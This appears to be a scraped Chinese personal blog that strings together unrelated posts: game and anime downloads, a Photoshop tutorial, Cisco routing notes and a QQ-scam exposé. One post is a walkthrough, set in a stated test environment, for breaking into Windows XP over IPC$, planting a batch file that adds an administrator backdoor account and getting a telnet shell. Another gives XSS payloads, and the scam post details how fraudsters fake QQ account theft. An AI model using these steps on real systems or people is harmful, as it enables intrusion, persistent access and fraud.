遇见心流 | 还好有你,再见如初

《红色警戒2(Red Alert 2)》原版1.006+尤里的复仇1.001繁体终极版+各种补丁+修

红色警戒2+尤里的复仇(繁体中文终极版)下载,这个是红色警戒2终极版(又名红色警报2),是在繁体官方光盘镜像的基础上,加上目前为止国内外各种补丁制作而成的完整版,带动画过场。并且兼容各种系统,包括最新的Win10(1803版)。

特色说明:

红色警戒2+尤里的复仇(繁体中文终极版)(Command.And.Conquer.Red.Alert.2+Command.And.Conquer.Red.Alert.2.Yuris.Revenge)又名红色警报2。

这是在繁体官方光盘镜像的基础上,加上目前为止国内外各种补丁制作而成的完整版,带动画过场。并且兼容各种系统,包括最新的Win10(1803版),可窗口可全屏、分辨率全显、解决了卡屏、黑屏、切换、联网等各种问题。
内带光盘安装视频说明和安装文字说明,各种补丁,可自由切换。

安装说明附赠终极动员令相关游戏的下载网址。此为个人收集制作整理,很多补丁国内还没看到第二人发过,比如免CD补丁,多种方案,其中有用EA官方推荐的工具和方法制作的,并非其它网站下载来的。也有从外国网站专门为WIN10定做的,国内之前也没人发过。

错误提示解决办法

出現如下錯誤提示:

   1、***FATAL***String Manager failed to initilaized properly
      !***FATAL***String Manager failed to initilaized properly
   2、紅色警戒 2
      錯誤-無法設定顯示模式
   3、TXT_SHORT_TITLE
      !TXT_PREPARECOM_FAILED
    第一次運行會出現,只要Ra2.exe Ra2md.exe右鍵《兼容模式》(Windows XP(Service Pack2))和《以管理员身份运行此程序》打上勾。
就可解决以上问题。第二次運行改回来用默认也能进了。
    第一次进游戏后,点网络(主要是局域网),系统会出这个“Windows 防火墙已经阻止此应用的部分功能”你点“允许访问 ”
以后就能看到完全菜单了。
窗口化方式: 
      桌面上的快捷方式D:\Westwood\RA2\Ra2.exe -win,然后兼容性中“设置”-“简化的颜色模式”打上勾,选16位(65536色), 点击应用。

看我这用的特别版原版窗口方式和传统版是不同的,无边。

本文转自:http://www.hlboke.com/?post=511

如何用Photoshop将人物照片制作成艺术感超强的墙面涂鸦效果!

涂鸦效果因其鲜明的颜色,让人感觉非常有冲击力和艺术感。那么对于万能的PS来说,是不是也可以把一个人物的照片制作成漂亮的涂鸦效果呢?答案是肯定的,话不多说,一起来看效果图:

最终效果:

主要过程:

1、在photoshop中创建一个850 x 630像素的新文档。

将砖墙素材添加到新层中。 根据您的画布尺寸调整图像大小。

2、在新图层中,添加涂鸦墙纹理。 根据您的画布尺寸,如果需要,请调整图像大小。

3、单击“ 图层”面板底部的第二个图标,将“ 图层蒙版”添加到“ 涂鸦墙”图层。

4、将前景颜色设置为#000000,选择画笔工具(B)。使用画笔笔刷在面具里面涂抹一些涂鸦效果,露出砖墙。

5、在新图层中添加人物图像,对人物图像做去背景处理。 使用魔术棒工具选择此图像的背景,按删除以删除所选的背景。

6、把处理过的人物图像移动涂鸦墙中,Ctrl+J复制人物图像一次,复制的图层的眼睛先关闭,需要用时再打开。

7、按入Ctrl键鼠标左键点击人物图像图层,获得选区,转到编辑-描边,描边3个像素,居外,颜色为黑色。

8、转到“ 滤镜”>“滤镜库”>“艺术效果”>“木刻”,然后选择“ 色阶数4”,“ 边缘简洁度4”和“ 边缘逼真度2”。

9、转到“ 图层”>“新建调整图层”>“色调分离”,并将“ 色阶”设置为4。 点击左侧的第三个按钮将此调整添加到以下图层的剪辑蒙版。

10、转到图层>新建调整图层>亮度/对比度,将亮度设置为-107,将对比度设置为-32。 点击左侧的第三个按钮将此调整添加到以下图层的剪辑蒙版。

11、转到图层>新建调整图层>色调/饱和度,并将色相设置为-17, 饱和度设置为12,明度设为-10。 点击左侧的第三个按钮将此调整添加到以下图层的剪辑蒙版。

12、创建一个新层。 将涂鸦墙图像复制并粘贴到此图层中并给它添加图层蒙版。把图层模式改成线性光。

选择画笔工具(B)。使用画笔笔刷在人物上面涂抹一些涂鸦效果。

13、点击人物复制图层旁边的眼睛图标显示图层。 将前景颜色设置为#000000 ,将背景颜色设置为#ffffff 。

转到滤镜>滤镜库>素描>影印,并将细节设置为4, 暗度设置为30。

14、转到图像>调整>色阶,并设置输入级别。

15、按Shift+Ctrl+Alt+E合并所有可见层,得到新的图层,在这一层我们做上有砖墙效果。

16、给这个砖效果图层添加图层蒙版,转到砖墙图层,Ctrl+A进行选择,按Ctrl+C进行复制。

17、返回到砖效果图层,点击蒙版,然后在“ 通道”选项卡上单击“图层6蒙版旁边的眼睛图标,使其可见。 按Ctrl+V将选择粘贴到此蒙版中。

18、返回图层选项卡,然后按Ctrl+D取消选择。双击图层打开图层样式窗口,并添加斜角和浮雕。

19、返回图层选项卡,然后按Ctrl+D取消选择。双击图层打开图层样式窗口,并添加斜角和浮雕。

好了,完成了,希望你能喜欢这个教学。

教程结束,以上就是今天为大家分享的全部内容,希望大家喜欢!

本文转自:http://www.hlboke.com/?post=470

Cisco模拟器使用静态路由实现全网通-20171027

先留个图让自己知道是这么个回事!哈哈,弄了差不多半小时才彻底弄懂啊,困惑了我俩个星期的静态路由!

有几点给自己提醒:

1、静态路由中PC到路由器是用的交叉线,路由器到路由器也是交叉线;

2、静态路由中PC到路由器的端口配的地址是PC的网关地址(多次在这个地方卡壳);

3、静态路由中配置代码是ip route [目标网段] [子网掩码] [出去端口],也就是说是指定的网段到我当前配的路由器出去的那条交叉线的端口ip,比如R1中配置3.0网段,实现PC1能和PC2通信,那么在图中对应的代码就应该是:ip route 192.168.3.0 255.255.255.0 192.168.2.2;

4、路由器那条红色的像闪电的线是Serial DCE线,需要在2621XM路由器中添加NM-4A/S模块或者NM-8A/S模块,然后用DCE线连serial端口;

为了避免遗忘,我还是把代码贴出来:

  1. R1(config)#ip route 192.168.3.0255.255.255.0192.168.2.2

  2. R1(config)#ip route 192.168.4.0255.255.255.0192.168.2.2

  3. R1(config)#ip route 192.168.5.0255.255.255.0192.168.2.2

  4. R1(config)#ip route 192.168.6.0255.255.255.0192.168.2.2

  5. R1(config)#ip route 192.168.7.0255.255.255.0192.168.2.2

  6. R1(config)#ip route 192.168.8.0255.255.255.0192.168.2.2

  7. R1(config)#ip route 192.168.9.0255.255.255.0192.168.2.2

  8.  

  9. R2(config)#ip route 192.168.1.0255.255.255.0192.168.2.1

  10. R2(config)#ip route 192.168.5.0255.255.255.0192.168.4.2

  11. R2(config)#ip route 192.168.6.0255.255.255.0192.168.4.2

  12. R2(config)#ip route 192.168.7.0255.255.255.0192.168.4.2

  13. R2(config)#ip route 192.168.8.0255.255.255.0192.168.4.2

  14. R2(config)#ip route 192.168.9.0255.255.255.0192.168.4.2

  15.  

  16. R3(config)#ip route 192.168.1.0255.255.255.0192.168.4.1

  17. R3(config)#ip route 192.168.2.0255.255.255.0192.168.4.1

  18. R3(config)#ip route 192.168.3.0255.255.255.0192.168.4.1

  19. R3(config)#ip route 192.168.7.0255.255.255.0192.168.6.2

  20. R3(config)#ip route 192.168.8.0255.255.255.0192.168.6.2

  21. R3(config)#ip route 192.168.9.0255.255.255.0192.168.6.2

  22.  

  23. R4(config)#ip route 192.168.1.0255.255.255.0192.168.6.1

  24. R4(config)#ip route 192.168.2.0255.255.255.0192.168.6.1

  25. R4(config)#ip route 192.168.3.0255.255.255.0192.168.6.1

  26. R4(config)#ip route 192.168.4.0255.255.255.0192.168.6.1

  27. R4(config)#ip route 192.168.5.0255.255.255.0192.168.6.1

  28. R4(config)#ip route 192.168.9.0255.255.255.0192.168.8.2

  29.  

  30. R5(config)#ip route 192.168.1.0255.255.255.0192.168.8.1

  31. R5(config)#ip route 192.168.2.0255.255.255.0192.168.8.1

  32. R5(config)#ip route 192.168.3.0255.255.255.0192.168.8.1

  33. R5(config)#ip route 192.168.4.0255.255.255.0192.168.8.1

  34. R5(config)#ip route 192.168.5.0255.255.255.0192.168.8.1

  35. R5(config)#ip route 192.168.6.0255.255.255.0192.168.8.1

  36. R5(config)#ip route 192.168.7.0255.255.255.0192.168.8.1


在这里还是把pkt的下载地址贴上~~ 百度网盘:链接:https://pan.baidu.com/s/1dFAOb2x 密码:tufx
蓝奏网盘:https://pan.lanzou.com/1881817
盛天网盘:http://pan.stnts.com/s/FFMHnPp
天翼网盘:http://cloud.189.cn/t/umqA7znARBNn(访问码:9271)
城通网盘:居然收费了orz!破网盘!


2017年科幻动画《刀剑神域:序列之争剧场版》BD日语中字

上映时间:2017-09-15  
刀剑神域:序列之争剧场版][BD-mkv.720p.日语中字][2017年科幻动画] 

◎译  名 刀剑神域:序列之争剧场版/刀剑神域:序列之争/刀剑神域:剧场版序列争战(台)/剧场版SAO
◎片  名 劇場版 ソードアート·オンライン -オーディナル·スケール / Sword Art Online the Movie: Ordinal Scale
◎年  代 2017
◎产  地 日本 
◎类  别 科幻/动画/冒险 
◎语  言 日语 
◎字  幕 中文 
◎上映日期 2017-02-18(日本)/2017-09-15(中国) 
◎IMDb评分 7.6/10 from 1,751 users
◎豆瓣评分 7.1/10 from 11,718 users
◎文件格式 x264 + aac
◎视频尺寸 1280 x 720
◎文件大小 1CD
◎片  长 120分钟 
◎导  演 伊藤智彦 Tomohiko Ito
◎主  演 松冈祯丞 Yoshitsugu Matsuoka
户松遥 Haruka Tomatsu
伊藤加奈惠 Kanae Ito
竹达彩奈 Ayana Taketatsu
日高里菜 Rina Hidaka
高垣彩阳 Ayahi Takagaki
泽城美雪 Miyuki Sawashiro
平田广明 Hiroaki Hirata
安元洋贵 Hiroki Yasumoto
山寺宏一 K?ichi Yamadera

◎简  介 

2022年,天才编程者茅场晶彦所开发的世界最早的完全潜行专用装备设备《NERvGear》。 

这个革命性的机器给VR(假想现实)世界带来了无限的可能性。那之后经过了4年…… 
《NERvGear》的后继品VR机为了对抗《AmuSphere》(第二代民用完全潜行机),发售了一个次世代的可穿戴设备《Augma》 

替换了完全潜行机能,是一个对AR(增强现实)功能进行了最大限度扩大的最先进机种。 

由于《Augma》在觉醒状态下也可以安全和便利地使用,因此一瞬间便在玩家当中传开了。 

这个杀手级内容,被叫做《Ordinal Scale序列之争(OS)》,是《Augma》专用的ARMMO RPG。 

亚斯娜和伙伴们会玩的这个游戏,桐人也准备参战了…… 

【下载地址】

盛天网盘:无损版(14.61GB):http://pan.stnts.com/s/2KdcINy

百度网盘:无损版(14.61GB):http://pan.baidu.com/s/1o7PhTNG 提取密码:6b5w

电影天堂/阳光电影(1.24GB):http://www.dytt8.net/html/gndy/dyzz/20171013/55290.html


遇见心流 | 网易云音乐多功能 |

  • 网易云音乐多功能

我也是醉了,取半天源码都出错,原来是编码问题,看来换个思路就解决了。

版本:【V1.0】

更新地址:【http://hlboke.lofter.com/】


利用IPC$共享入侵windowsXP

测试环境:主机(windows XP sp3)与windows XP sp2虚拟机)
   通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$.....”(很危险啊)。
现在进入正题:



出现53错误:找不到网络路径,(目标主机打开了系统防火墙或者其他防火墙软件,解决:关闭目标防火墙)
出现1326错误:

1)net use \\目标IP\ipc$ "" /user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。

2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest连接,是无法访问IPC$等管理共享的.结果发现这个错误,纠正。

紧接着可能出现1327错误:登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".



映射对方默认共享c盘:net use z: \\目标IP\c$



在我的电脑中会出现网络驱动器



建立ipc$告一段落,删除ipc$连接:net sue \\目标IP\ipc$ /del

在此基础上在目标电脑上留下后门账号:
编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为adduser.bat)
net user nebulastest 123456 /add //增加用户nebulastest,密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限

然后在本机上执行命令(已经建立IPC$连接):copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增加计划任务:at \\目标IP 执行时间 c:\adduser.bat



删除当前IPC$链接,使用新用户和新密码建立IPC$链接,以测试时候建立账号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"




(前提:目标电脑已经开启telnet服务)

双击“telnet服务”-----选择“自动”-----点击“启动”



在命令行输入:telnet 目标IP
之后弹出远程登录对话框,选择Y,输入用户名(后门账户,密码)
输入密码不会现在但是回车后会自动验证是否密码正确



下图已经输入密码但是不会显示:



登陆后的界面:



大功告成,获得目标主机shell

安卓EA模拟人生Sims免费版 V5.28.2无限金币破解版

游戏介绍

《模拟人生畅玩版无限金币破解版 The Sims FreePlay》自由自在地生活!无拘无束地遨游!由开发畅销游戏——模拟人生3手机系列的原班人马打造,让你在Android平台上尽情免费享受模拟人生的乐趣。 
** 借助情人节礼物与模拟人物们擦亮爱的火花——现已到货!** 
开始免费游戏吧!创建多达16名从头到脚定制的模拟人物,还可以…… 
• 设计你理想中的家园,或者直接让你的模拟人物住进配置齐全的房子  
• 照料宠物、打理花园、甚至可以烘培香喷喷的蛋糕 
• 为你的模拟人物发展职业,挣取模拟币以改善生活 
• 达成各项目标便能获得Lifestyle点数, 用以兑换新潮物品 
• 与你的模拟人物实时同步(无论你是在白天还是夜晚,模拟人物总会和你处于同一时间) 
…更不可思议的是:游戏是免费的! 
一切模拟皆有可能 
你的模拟人物们会成为朋友还是仇敌?无论是通过扇耳光、击掌还是“嘿咻”,皆可建立起丰富的人际关系!让你的小镇因为宠物店、车店以及超市的开张而变得喧嚣起来。创建更多的模拟人物,你的城市就会发展的越来越繁荣。 
自由自在,无拘无束!模拟人生,模拟无限可能!  
 
【关于数据包】如果数据包是根据机型分辨率进行下载的,如果用我提供的可能会出现闪退,黑屏,建议大家自行使用WIFI下载,这样可以完美运行,如果你无法下载数据包,只看到一个EA标志不变,请科学上网! 
【破解说明】修改金币,金钱SP无限个 

虽然说破解了金钱 但是游戏乐趣还是有的

大家可以去试试 安装包比较小 但是需要下载资源建议WIFI模式安装

博主MX6亲测稳定运行没毛病!

下载地址:

点击下载

本文作者:Edwiin 文章标题:《安卓EA模拟人生Sims免费版 V5.28.2无限金币破解版
版权说明:若无特别注明,本文皆为“遇见心流”原创,转载请保留出处!

好好看看这人性的小漫画, 时间是被自己亲手杀死的

战斗民族的厉害之处,我们都领教过。

要是让他们来小漫画呢?肯定也非常神奇。

比如我要介绍的这位俄罗斯漫画家Anton Gudim。

经过非常用力地观察,才能发现那片月光是画上去的,一翻身就多了两道白…

盯着看了半小时,终于看明白了,结果根本笑不出来。

你确定你看到的不是冰山一角?

不要轻易打开一个人的心

别人的目光远远比阳光更刺眼

请不要伤害身边那些单纯的人

打折的含义

或许这就是我们留给后人的墙壁文化

冲破红线?

这么丧,赶紧喝杯咖啡缓缓,结果它也苦得跟你的人生似的。

我们的时间大多是被自己亲手杀死

HACKER圈中一些常用的交流词语解释

看完了感觉逼格提升,再也不怕不懂大佬们说的啥了!

社工:社会工程学 一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。

单反:社工术语 一个好友辅助申诉
裸奔:社工术语 不需要好友辅助申诉
肉鸡:肉鸡也称傀儡机,是指可以被黑客远程控制的机器
人肉:人肉,一般是指人肉搜索,通过匿名知情人提供数据的方式搜集信息
谷歌黑客:Google hacking 使用搜索引擎,比如谷歌来定位因特网上的安全隐患和易攻击点
SQL注入:通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
弱口令:弱口令指的是仅包含简单数字和字母的口令,例如"123"、"abc"等,因为这样的口令很容易被别人破解
DDOS:DDOS全名是分布式拒绝服务,很多DOS攻击源一起攻击某台服务器就组成了DDOS攻击 通过很多“僵尸主机”向受害主机发送大量看似合法的网络包,从而造成网络阻塞或服务器资源耗尽而导致拒绝服务
cc攻击:攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽
webshell:在网站后台插入一个后门 可以随意篡改主页
提权:提权是黑客的专业名词,一般用于网站入侵和系统入侵
跳板:利用跳板 入侵其他的电脑 从而入侵网站等从事非法操作 不会被抓
注入点:可以实行注入的地方
影子系统:创建一个和真实操作系统一模一样的虚拟化影像系统。进入影子系统后,所有操作都是虚拟的,所有的病毒和流氓软件都无法感染真正的操作系统。系统出现问题了,或者上网产生垃圾文件,只需轻松的重启电脑,一切又恢复最佳状态。
虚拟机:虚拟机是指可以像真实机器一样运行程序的计算机的软件实现。
VPN:可以访问Youtube,Twitter,Facebook等国内进不去的网站
IP:人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址,该标识地址就是IP地址。
局域网:局域网(Local Area Network)是在一个局部的地理范围内(如一个学校、工厂和机关内)
暗网:又称深网,是指互联网上的内容,不属于网络的表面
旁注:旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell
远控:是在网络上由一台电脑远距离去控制另一台电脑的技术
域名:是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称
用户名:英文名:Username,是网络术语之一。就是要登陆(登入、登录、进入等)的帐户名
password:英文单词password的意思为:密码
pe盘:u盘做系统是指把普通的U盘制作成可以引导的PE盘来代替光驱进行计算机操作系统安装的过程
DOS命令:DOS命令,是DOS操作系统的命令,是一种面向磁盘的操作命令
代理ip:我们知道这些代理服务器的地址,就可以利用它到达国外网站。
MD5:一种加密算法
社工库:帮助您判断您的密码或个人信息是否已经被公开或泄漏
源码:源码就是指编写的最原始程序的代码
whois:whois是用来查询域名的IP以及所有者等信息的传输协议
XSS:跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行
免杀:一种能使病毒木马避免被杀毒软件查杀的技术
拖库:来指网站遭到入侵后,黑客窃取其数据库。
抓鸡:“抓鸡”是黑客界的一种流行语言.这里所说的"鸡",是指"电脑肉鸡".

跨站的艺术:XSS Fuzzing 的技巧

对于XSS的漏洞挖掘过程,其实就是一个使用Payload不断测试和调整再测试的过程,这个过程我们把它叫做Fuzzing;同样是Fuzzing,有些人挖洞比较高效,有些人却不那么容易挖出漏洞,除了掌握的技术之外,比如编码的绕过处理等,还包含一些技巧性的东西,掌握一些技巧和规律,可以使得挖洞会更加从容。

XSS应该是我挖过的最多漏洞的一种Web漏洞类型,累积下来,就国内BAT、金山、新浪、网易等这些互联网公司的XSS,应该至少也有超过100个,这篇文章主要就是根据自己的一些经验与大家一起探讨编码绕过、处理等技术因素之外的XSS Fuzzing的一些技巧。

Fuzzing(模糊测试)是挖掘漏洞最常用的手段之一,不止是XSS,应该可以说Fuzzing可以用于大部分类型的漏洞挖掘。通俗可以把这种方式理解为不断尝试的过程。

XSS的Fuzzing流程

这是一个比较常规的Web漏扫中XSS检测插件的一个流程图,其中比较关键的几个点在于:

检测输入点 潜在注入点检测 生成Payload Payload攻击验证检测输入点其实就是寻找数据入口,比如说GET/POST数据,或者Header头部里的UA/Referer/Cookie,再或者URL路径等等,这些都可以成为输入入口,转换为比较形象点的说法,比如看到一个搜索框,你可能会在搜索框里提交关键词进行搜索,那么这里可能就发生了一个GET或者POST请求,这里其实就是一个输入点。
其次是潜在注入点检测,潜在注入的检测是判断输入点是否可以成功把数据注入到页面内容,对于提交数据内容但是不输出到页面的输入点是没有必要进行Fuzzing的,因为即使可以提交攻击代码,也不会产生XSS;在潜在注入点的检测通常使用的是一个随机字符串,比如随机6位数字,再判断这6位数字是否返回输出在页面,以此来进行判断。为什么不直接使用Payload进行判断呢?因为Payload里包含了攻击代码,通常很多应用都有防火墙或者过滤机制,Payload中的关键词会被拦截导致提交失败或者不会返回输出在页面,但这种情况不代表不能XSS,因为有可能只是Payload不够好,没有绕过过滤或者其他安全机制,所以采用无害的随机数字字符就可以避免这种情况产生,先验证可注入,再调整Payload去绕过过滤;而随机的目的在于不希望固定字符成为XSS防御黑名单里的关键词。

再者就是生成Payload和进行攻击验证的过程,Payload的好坏决定了攻击是否可以成功;而对于不同情况的注入点,需要使用的Payload也是不同的,比如,注入的位置在标签属性中还是标签事件中,使用的Payload是不同的;

标签属性中:如<a href="注入位置">test</a>,Payload:"></a><script>alert(0)</script><a href=" 标签事件中:<img href="a.jpg" onload="注入位置">, Payload:alert(0) 其实Payload的生成就是一个不断Fuzzing和不断调整的过程,根据注入位置上下文代码的结构、内容以及应用过滤机制等不断调整和不断提交测试的过程,下图是一个Payload的生成流程。


那么假如某次Payload调整后Fuzzing成功,也就意味XSS注入成功,并得出这个漏洞的PoC。
其实为什么一开始就介绍下扫描器常规的XSS检测方式呢?因为手工Fuzzing XSS其实也是这样一个过程,很多安全工具其实就是将手工的过程自动化。

刷q币是真的吗?博主告诉你事实真相!

不知道大家是否听过三人成虎的故事:
战国策里有个桥段,庞葱要陪太子到邯郸去做人质,他对魏王说:“现在,如果有一个人说大街上有老虎,您相信吗”
魏王说:“不相信。”
庞葱说:“如果是两个人说呢?”
魏王说:“那我就要疑惑了。”
庞葱又说:“如果增加到三个人呢,大王相信吗?”
魏王说:“我相信了。”
庞葱说:“大街上不会有老虎那是很清楚的,但是三个人说有老虎,就像真有老虎了。如今邯郸离大梁,比我们到街市远得多,而毁谤我的人超过了三个。希望您能明察秋毫。”
魏王说:“我知道该怎么办。”
于是庞葱告辞而去,而毁谤他的话很快传到魏王那里。后来太子结束了人质的生活,庞葱果真不能再见魏王了。
事实和真理并不重要,重要的是人们愿意相信什么。
我来说说流行了很多年的骗局,所谓的“刷Q币”
QQ刷钻的骗局持续了好多年,高峰时期各类QQ刷钻相关的关键词每天在百度有过万的搜索量,而骗子的伎俩也很简单。
花钱把所有Q钻全部开通,然后在签名处写上类似“刷Q币,50块钱500Q币,100块500000Q币”“100元shua永久Q钻”。99%都是骗子,剩下的1%是用宽带账号开钻或手机卡开钻,严格意义来说都是要花钱的。
有没有永久钻呢?群主给的答案是:绝对没有!

很多人想要开Q钻,但是感觉太贵了,所以就想找便宜的。
骗子当然是无所不能了,既然你们有需要,那我就给你们圆梦呗,一瞬间大量的骗子从事唰钻行业,骗子的推波助澜,以及傻子的执着相信,让这个骗局至今仍有上当的人。
最搞笑的骗局只怕说出来都没人信,这个叫做“刷Q币代码”
骗子在网上发大量的帖子,内容是有一串代码可以让Q币翻倍,只要给网管说自己要冲Q币,并把“shua钻代码”告诉网管,然后再充一次,这次要告诉网管你真正的QQ号,就可以实现Q币翻倍。
这个刷钻代码其实就是10位数的QQ号,而小白其实是把Q币冲给骗子的Q号了…
腾讯这么大的一个企业,那么多工程师,怎么会存在这种弱智漏洞。
他说:你给我教教怎么shuaQ币
我说:都是假的
他说:网上很多人都说是真的,我同学他哥就会shuaQ币呢。
我说:那也是假的。
他说:是你不会吧,还说别人是假的…
这是当时的真实对话,从这以后我也会刷Q币了,我知道我拦不住他们,所以只能任由他们继续,但又不好显的自己很无知,所以我就会了,就是这么简单。
自此,这个世上又多了一个会刷Q币的人……
还记得曾经轰动一时的神童记忆课程吗?
号称任何小孩只要学习他们的课程后可以过目不忘,倒背如流,而且记者去报道了,见证了这神奇的记忆课程。但是!都是假的!
所谓的倒背如流其实是提前就让孩子背过去的,包括速算,其实只有在特定的数字情况下可以实现,可以说应用面很窄。
孩子、家长、媒体全部参与了造假。
孩子为了获得关注和赞扬。
家长为了让人感觉自己孩子很厉害,比较有面子。
媒体则找到了新的热点和素材。

上面的都是小儿科,我们见证一下骗子日收入过百的全部操作方法。

这里可以看出来每天也有好几千个搜索量。
有人搜索就肯定有这个需求,但这些所谓的密码破解器根本就是不存在的。

别小瞧这些人,收入比一般的上班族高多了。
1.通过淘宝分词技术,一般可以躲过淘宝审核,又可以让用户搜到,在这里淘宝仅扮演流量来源的角色,同样他们也会在网上发大量的帖子,好让潜在客户能被搜到。
2.引导用户使用QQ聊天,具体话术如下。
小白:盗Q号多钱,我想进别人QQ空间?
骗子:600块,成功再给钱,先交20块的押金。(也可能是10块,都无所谓,蚊子再小也是肉)
3. 拿到押金后,搜索要盗的QQ号,然后把自己的Q号的头像和昵称改的和被盗的号一样。
4. 用手机录像,登录修改过昵称和头像的Q号。录像的时候,尤其是输入QQ号这一步一定要快速,最好提前登陆,这样QQ就有缓存了,录像的时候适时的晃一下手机,让录像模糊那么一下下。
5. 小白看到确实是要盗的Q号的昵称和头像,出于先入为主的思想观念基本都信了。
然后这一单几百块的收入就到手了,就是这么简单。
具体的心理动态如下:
A:既然这个人主动找上门来,证明他信有人能破解Q密码。
B:骗子QQ装扮的比较专业,有自己的网站,看着比较正规,加深用户对他的信赖感。
C:押金是为了过滤一些浪费时间的无效用户,而且即便用户看出来你骗他,至少还有10~20块钱,也不枉浪费几分钟和小白聊天。
总结:
这个世界只要有人还想要走捷径,有人相信,骗子就会存在,诸如致富秘籍、高息P2P存款、炒股稳赚的秘籍、shuaQ币、CF唰枪、炒黄金、炒现货…十之八九都是骗子,而受骗的人有第一次仍然会有第二次,因为他们更愿意相信他们愿意相信的,而非真理。